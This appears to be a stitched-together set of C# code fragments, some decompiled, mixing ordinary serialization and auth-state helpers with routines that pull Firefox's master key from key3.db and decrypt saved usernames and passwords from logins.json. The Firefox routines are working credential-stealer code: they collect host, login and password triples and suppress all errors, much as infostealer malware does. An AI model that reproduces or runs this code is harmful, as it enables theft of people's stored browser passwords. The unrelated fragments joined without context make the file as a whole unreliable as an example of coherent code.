empty = sqlConnection.ParseValue(rowIndex, "a11");
break;
}
}
Asn1Object asn1Object2 = Asn1Factory.Create(Encoding.Default.GetBytes(empty));
byte[] objectData3 = asn1Object2.Objects[0].Objects[0].Objects[1].Objects[0].ObjectData;
byte[] objectData4 = asn1Object2.Objects[0].Objects[1].ObjectData;
GeckoPasswordBasedEncryption passwordBasedEncryption2 = new GeckoPasswordBasedEncryption(Encoding.Default.GetBytes(s), Encoding.Default.GetBytes(string.Empty), objectData3);
passwordBasedEncryption2.Init();
numArray = Encoding.Default.GetBytes(TripleDESHelper.Decrypt(passwordBasedEncryption2.DataKey, passwordBasedEncryption2.DataIV, objectData4, PaddingMode.PKCS7));
}
catch
{
}
return(numArray);
}
/// <summary>
/// 反序列化,从XML文件中反序列化数据
/// </summary>
/// <param name="filename"></param>
/// <typeparam name="T"></typeparam>
/// <returns></returns>
public virtual T Load <T>(string filename) where T : class
{
StreamReader reader = null;
try
{
if (!File.Exists(filename))
{
return(null);
}
reader = new StreamReader(filename, Encoding.UTF8);
var str = reader.ReadToEnd();
if (string.IsNullOrEmpty(str))
{
return(null);
}
var elementType = typeof(T);
var runConfigType = typeof(RunConfig);
if (elementType != runConfigType &&
!runConfigType.IsAssignableFrom(elementType) &&
!str.Contains("{") && !str.Contains("["))
{
//不是个有效json数据,那么判断是否为机密过的数据
//要求加载数据时,不管配置信息是否要求加密,都能根据实际数据解析出结果
str = TripleDESHelper.Decrypt(str);
}
return(JsonUtils.Deserialize <T>(str));
}
catch (Exception ex)
{
Logger.Error("SerializationHelper.Load:" + ex.Message);
return(null);
}
finally
{
if (reader != null)
{
reader.Close();
}
}
}
private bool ValidAuthState(string state, out long id, out string authState)
{
id = 0;
authState = null;
try
{
var data = MD5Helper.ConvertStringToByte(state);
data = TripleDESHelper.Decrypt(data, this._appSettings.GetTripleDESKeyData(), null, CipherMode.ECB, PaddingMode.PKCS7);
var origStr = Encoding.UTF8.GetString(data);
if (!string.IsNullOrWhiteSpace(origStr) && Regex.IsMatch(origStr, @"^\d+_"))
{
var idxS = origStr.IndexOf('_');
var idxE = origStr.LastIndexOf('_');
id = long.Parse(origStr.Substring(0, idxS));
authState = origStr.Substring(idxS + 1, idxE - idxS - 1);
return(true);
}
}
catch { }
return(false);
}
// Token: 0x060000E9 RID: 233 RVA: 0x000076D8 File Offset: 0x000058D8
private static byte[] ExtractPrivateKey3(string file)
{
byte[] array = new byte[24];
try
{
Console.WriteLine("Key source file: " + file);
if (!File.Exists(file))
{
Console.WriteLine("Source file UNKNOWN");
return(array);
}
new DataTable();
Asn1Der asn1Der = new Asn1Der();
BerkeleyDB berkeleyDB = new BerkeleyDB(file);
PasswordCheck passwordCheck = new PasswordCheck(FirefoxBase.FindValueByKey(berkeleyDB, (string x) => x.Equals("password-check")));
string hexString = FirefoxBase.FindValueByKey(berkeleyDB, (string x) => x.Equals("global-salt"));
MozillaPBE mozillaPBE = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), ByteHelper.ConvertHexStringToByteArray(passwordCheck.EntrySalt));
mozillaPBE.Compute();
TripleDESHelper.DESCBCDecryptor(mozillaPBE.Key, mozillaPBE.IV, ByteHelper.ConvertHexStringToByteArray(passwordCheck.Passwordcheck), PaddingMode.None);
string hexString2 = FirefoxBase.FindValueByKey(berkeleyDB, (string x) => !x.Equals("password-check") && !x.Equals("Version") && !x.Equals("global-salt"));
Asn1DerObject asn1DerObject = asn1Der.Parse(ByteHelper.ConvertHexStringToByteArray(hexString2));
MozillaPBE mozillaPBE2 = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), asn1DerObject.objects[0].objects[0].objects[1].objects[0].Data);
mozillaPBE2.Compute();
byte[] bytes = Encoding.Default.GetBytes(TripleDESHelper.DESCBCDecryptor(mozillaPBE2.Key, mozillaPBE2.IV, asn1DerObject.objects[0].objects[1].Data, PaddingMode.None));
Asn1DerObject asn1DerObject2 = asn1Der.Parse(bytes);
Asn1DerObject asn1DerObject3 = asn1Der.Parse(asn1DerObject2.objects[0].objects[2].Data);
if (asn1DerObject3.objects[0].objects[3].Data.Length > 24)
{
Array.Copy(asn1DerObject3.objects[0].objects[3].Data, asn1DerObject3.objects[0].objects[3].Data.Length - 24, array, 0, 24);
}
else
{
array = asn1DerObject3.objects[0].objects[3].Data;
}
}
catch
{
}
return(array);
}
// Token: 0x060002C9 RID: 713 RVA: 0x0000CBD0 File Offset: 0x0000ADD0
private static List <LoginPair> ParseLogins(string profile, byte[] privateKey)
{
List <LoginPair> list = new List <LoginPair>();
try
{
if (!File.Exists(Path.Combine(profile, "logins.json")))
{
return(list);
}
bool flag;
string path = DecryptHelper.TryCreateTemp(Path.Combine(profile, "logins.json"), out flag);
foreach (object obj in ((IEnumerable)File.ReadAllText(path).FromJSON()["logins"]))
{
JsonValue jsonValue = (JsonValue)obj;
Asn1Object asn1Object = Asn1Factory.Create(Convert.FromBase64String(jsonValue["encryptedUsername"].ToString(false)));
Asn1Object asn1Object2 = Asn1Factory.Create(Convert.FromBase64String(jsonValue["encryptedPassword"].ToString(false)));
string text = Regex.Replace(TripleDESHelper.Decrypt(privateKey, asn1Object.Objects[0].Objects[1].Objects[1].ObjectData, asn1Object.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
string text2 = Regex.Replace(TripleDESHelper.Decrypt(privateKey, asn1Object2.Objects[0].Objects[1].Objects[1].ObjectData, asn1Object2.Objects[0].Objects[2].ObjectData, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
LoginPair loginPair = new LoginPair
{
Host = (string.IsNullOrEmpty(jsonValue["hostname"].ToString(false)) ? "UNKNOWN" : jsonValue["hostname"].ToString(false)),
Login = (string.IsNullOrEmpty(text) ? "UNKNOWN" : text),
Password = (string.IsNullOrEmpty(text2) ? "UNKNOWN" : text2)
};
if (loginPair.Login != "UNKNOWN" && loginPair.Password != "UNKNOWN" && loginPair.Host != "UNKNOWN")
{
list.Add(loginPair);
}
}
if (flag)
{
File.Delete(path);
}
}
catch (Exception)
{
}
return(list);
}
